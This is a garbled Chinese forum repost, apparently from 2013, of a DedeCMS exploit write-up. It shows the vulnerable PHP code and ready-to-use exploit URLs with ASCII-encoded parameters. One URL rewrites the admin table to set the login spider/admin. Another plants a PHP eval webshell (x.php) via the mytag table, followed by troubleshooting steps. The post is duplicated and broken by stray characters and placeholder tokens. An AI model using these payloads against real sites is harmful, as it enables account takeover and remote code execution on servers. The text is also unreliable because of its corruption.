|
|
此漏洞无视gpc转义,过80sec注入防御。' |& J! H! x3 l. s
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?- R1 }4 o* H# C8 f
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。+ ^% B9 o, T2 p$ F% [3 H
include/dedesql.class.php
F- \' u( ^5 n% g* Uif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
9 R3 N6 T* w: m! h( ^同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2/ a+ K* o. R' v1 a
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
9 W3 p- K, }8 D$ w6 `) Mplus/download.php
+ g# S, X0 K2 N5 F- G2 Xelse if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc): v! O; J. W& }4 t
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
. |/ h2 E$ y6 H0 ?$ CUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:& M5 x; N4 m) [3 s/ N3 a
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
$ v7 `; F( L8 A& ~. w0 C2 n漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
- T5 `& ?6 J& J) m如果找不到后台,参见以前修改数据库直接拿SHELL的方法- `' `& x1 x- p9 d
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。 U* ?# J; I, K8 v- X2 ^; p
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
0 B; {. a5 S& S# j$ x起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。$ `0 B/ S9 u- i, i
include/dedesql.class.php& ^& q$ V5 h, F+ W# W. n1 A; a
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
# j% I+ \0 o) H* [) }. G9 @同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
* O& \+ [! X8 F5 b$ |而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。# c6 y: e* v9 @- ?
plus/download.php( U3 q" p/ O6 a7 `! _
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("locationlink"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc): V' G' G0 S2 l2 F8 e
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:. a3 ~2 u, { n5 i' {. P
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:0 N8 M) f! R! |* Q
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
6 F' w% | |! U1 @" v1 X n9 y$ Q" q- j漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。2 _4 o; p' B5 o ~3 H
如果找不到后台,参见以前修改数据库直接拿SHELL的方法
3 n9 U& F. Q8 s% q/ n( B4 Z___FCKpd___6getshell:
* V! a2 G% s9 M" \! }' M& ^0 v& xhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m" c/ B' x: I& D9 d3 N
http://127.0.0.1/plus/x.php
6 X6 ^2 E* E* a8 N# R+ t- A, mupdate成功后还要访问下 /plus/mytag_js.php?aid=1- ? K3 I) b- |( N
失败原因:2 L, g$ ~' W. _' X% T, v7 S
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)$ @2 _9 t# _& a2 X v- L8 i
配图:/ c2 {* {. J* x' p& T# C$ W
1.查看dede当前版本+ s% T, v% w5 X& y
# f/ J% Y/ ?: E. w6 d) C
2.执行exp1 ~0 Y" @+ E! e% W+ J
a; M! Y4 m Ehttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台5 {) N0 L# g7 ]; N
: k8 m$ k U' X y9 L. `- I
spider密码admin' F2 W b2 |) C6 X; K/ g1 W0 L
2 T q9 E5 c3 [" l- V( {( l. [/ V8 f
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
0 c& y/ Z! E4 D) R8 J! l原作者:imspider' u: P1 ]3 G+ J
4 @3 U" C) M. N2 z$ \2 M- t$ w3 L本博客测试+配图+getshell3 Q8 X: Z# G1 I- a+ [
POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT
( i4 k: [* a: [% l+ X7 D: `2 ^" @. I
getshell:* [1 z( { y9 S: C# ?. L- d
___FCKpd___7会在plus目录生成 x.php 密码 m; g; ]( n* _' s. T% H0 j: p5 K; A
http://127.0.0.1/plus/x.php$ T+ ^* T9 A' Q+ B
update成功后还要访问下 /plus/mytag_js.php?aid=1% S% P5 R8 K5 o
失败原因:" v. X# Q& S! o S. b/ L" @" m% b
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)+ S0 _6 I9 H5 ]' T+ m: ?
配图:
+ E/ N2 ^4 Y. W* x1 h0 d6 N2 [1.查看dede当前版本
; z) _8 e' X/ f4 K' dhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png- C* E6 n3 y: K, G V& J+ `2 ~
2.执行exp6 c: w& x# S: F' w" e
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
. ?; V; ~& v5 Mspider密码admin
. f/ d8 ?! P8 Thttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png% q* h1 u. K0 l* z
6 p! J0 e3 Q" n) c6 f |
|
发表于 2013-9-21 16:08:21
收藏
支持
反对